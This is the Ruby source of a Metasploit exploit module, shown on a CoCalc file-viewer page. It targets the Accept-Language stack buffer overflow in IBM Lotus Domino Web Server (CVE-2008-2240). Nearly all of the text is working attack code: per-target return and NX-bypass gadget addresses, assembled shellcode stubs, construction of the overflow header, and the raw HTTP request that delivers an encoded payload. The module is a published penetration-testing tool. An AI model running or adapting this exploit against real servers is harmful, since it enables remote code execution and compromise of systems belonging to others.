CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/windows/lotus/domino_http_accept_language.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = AverageRanking78include Msf::Exploit::Remote::HttpClient910def initialize(info = {})11super(update_info(info,12'Name' => 'IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow',13'Description' => %q{14This module exploits a stack buffer overflow in IBM Lotus Domino Web Server15prior to version 7.0.3FP1 and 8.0.1. This flaw is triggered by any HTTP16request with an Accept-Language header greater than 114 bytes.17},18'Author' => [ 'Fairuzan Roslan <riaf[at]mysec.org>', '<Earl Marcus klks[at]mysec.org>' ],19'License' => MSF_LICENSE,20'References' =>21[22['CVE', '2008-2240'],23['OSVDB', '45415'],24['BID', '29310'],25['URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21303057'],26],27'DefaultOptions' =>28{29'EXITFUNC' => 'thread',30},31'Privileged' => true,32'Payload' =>33{34'Space' => 800,35'BadChars' => "\x00\x0a\x20\x2c\x3b",36'StackAdjustment' => -3500,37},38'Platform' => 'win',39'Targets' =>40[4142['Lotus Domino 7.0 on Windows 2003 SP1 English(NX)',43{44'FixESP' => 0x70335c79, # add esp, 0x324, ret @fontmanager.dll45'FixESI' => 0x603055da, # push esp, pop esi, ret @nnotes.dll46'FixEBP' => 0x60a8bc90, # push esp, pop ebp, ret 0x10 @nnotes.dll47'Ret' => 0x62c838c7, # ret 0x12e @nlsccstr.dl48'DisableNX' => 0x7c83e413, # NX Disable @ntdll.dll49'JmpESP' => 0x62c6072e, # jmp esp @nlsccstr.dll50}51],5253['Lotus Domino 7.0 on Windows 2003 SP2 English(NX)',54{55'FixESP' => 0x70335c79, # add esp, 0x324, ret @fontmanager.dll56'FixESI' => 0x603055da, # push esp, pop esi, ret @nnotes.dll57'FixEBP' => 0x60a8bc90, # push esp, pop ebp, ret 0x10 @nnotes.dll58'Ret' => 0x62c838c7, # ret 0x12e @nlsccstr.dll59'DisableNX' => 0x7c83f517, # NX Disable @ntdll.dll60'JmpESP' => 0x62c6072e, # jmp esp @nlsccstr.dll61}62],6364['Lotus Domino 7.0 on Windows 2003/2000/XP English(NO NX)',65{66'FixESP' => 0x70335c79, # add esp, 0x324, ret @fontmanager.dll67'JmpESP' => 0x62c6072e, # jmp esp @lsccstr.dll68}69],7071['Lotus Domino 8.0 on Windows 2003 SP1 English(NX)',72{73'FixESP' => 0x7ea0615c, # add esp, 0x324, ret @net.dll74'FixESI' => 0x639a7f87, # push esp, pop esi, ret @nlsccstr.dll75'FixEBP' => 0x6391c9f7, # push esp, pop ebp, ret 0x10 @nlsccstr.dll76'Ret' => 0x7f8b0628, # ret 0x12e @j9gc23.dll77'DisableNX' => 0x7c83e413, # NX Disable @ntdll.dll78'JmpESP' => 0x6391071e, # jmp esp @nlsccstr.dll79}80],8182['Lotus Domino 8.0 on Windows 2003 SP2 English(NX)',83{84'FixESP' => 0x7ea0615c, # add esp, 0x324, ret @net.dll85'FixESI' => 0x639a7f87, # push esp, pop esi, ret @nlsccstr.dll86'FixEBP' => 0x6391c9f7, # push esp, pop ebp, ret 0x10 @nlsccstr.dll87'Ret' => 0x7f8b0628, # ret 0x12e @j9gc23.dll88'DisableNX' => 0x7c83f517, # NX Disable @ntdll.dll89'JmpESP' => 0x6391071e, # jmp esp @nlsccstr.dll90}91],9293['Lotus Domino 8.0 on Windows 2003/2000/XP English(NO NX)',94{95'FixESP' => 0x7ea0615c, # add esp, 0x324, ret @net.dll96'JmpESP' => 0x6391071e, # jmp esp @nlsccstr.dll97}98],99100],101'DisclosureDate' => '2008-05-20'))102end103104def exploit105connect106107lang = rand_text_alphanumeric(116) # greetz to hateful chris108lang[ 56, 4 ] = [ 0xfffffffe ].pack('V') # Fix Second crash (esi)109lang[ 68, 4 ] = [ 0x7ffaf0ec ].pack('V') # Fix Second crash (eax)110lang[ 104, 4 ] = [ 0x7ffaf030 ].pack('V') # Fix First crash111lang[ 112, 4 ] = [target['FixESP']].pack('V') # 1112lang << "\x00"113lang << payload.encoded114115if(not target['DisableNX'])116lang[ 16, 15 ] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-0xc4 pop edi sub edi,-0x86 call edi").encode_string # 4117lang[ 80, 4 ] = [target['JmpESP']].pack('V') # 2118lang[ 84, 2 ] = Rex::Arch::X86.jmp_short(-0x46) # 3 jmp back to top119else120lang[ 16, 16 ] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-0xd8 pop edi pop edi sub edi,-0x86 call edi").encode_string # 8121lang[ 80, 4 ] = [target['FixESI']].pack('V') # 2122lang[ 84, 4 ] = [target['FixEBP']].pack('V') # 3123lang[ 88, 4 ] = [target['Ret']].pack('V') # 4124lang[ 92, 4 ] = [target['JmpESP']].pack('V') # 6125lang[ 100, 2 ] = Rex::Arch::X86.jmp_short(-0x56) # 7 jmp back to top126lang[ 108, 4 ] = [target['DisableNX']].pack('V') # 5127end128129uri = rand_text_alpha_lower(16) + '.nsf?' + rand_text_highascii(1) # Trigger130131print_status("Trying target #{target.name}...")132send_request_raw({133'uri' => "#{uri}",134'method' => 'GET',135'headers' =>136{137'Accept' => '*/*',138'Accept-Language' => "#{lang}",139'Accept-Encoding' => 'gzip,deflate',140'Keep-Alive' => '300',141'Connection' => 'keep-alive',142'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',143}144}, 5)145handler146disconnect147end148end149150151